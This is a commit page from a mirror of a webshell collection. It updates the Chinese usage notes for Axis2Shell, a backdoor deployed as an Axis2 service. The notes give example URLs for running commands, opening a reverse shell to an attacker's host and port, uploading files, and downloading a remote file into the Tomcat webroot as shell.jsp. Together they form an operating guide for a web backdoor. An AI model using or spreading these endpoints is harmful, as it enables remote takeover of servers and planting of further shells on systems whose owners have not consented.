1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

update @Svti/Axis2Shell

This commit is contained in:
tennc
2014-11-17 09:38:55 +08:00
parent 2a76726c75
commit 38e0361231

View File

@@ -8,19 +8,17 @@ url : https://github.com/Svti/Axis2Shell
使用介绍:
1、命令执行
http://1.1.1.1/services/config/exec?cmd=whoami
http://1.1.1.1/services/config/exec?cmd=whoami
(不说了,执行命令。注意:xml换行没有处理好)
2、反弹shell
http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555
(Linux则使用bash反弹shellWindows则会进行socket执行shell)
3、文件上传
http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp
(会把resource目录下面的one.txt 写成shell.jsp注意全路径带*文件名)
4、文件下载
http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp
(会把这个URL的文件写成shell.jsp注意全路径带*文件名)
@@ -41,7 +39,6 @@ ps:
源码已经上github https://github.com/Svti/Axis2Shell
aar 文件https://github.com/Svti/Axis2Shell/blob/master/config.aar也在github上面还有什么问题可以在下面评论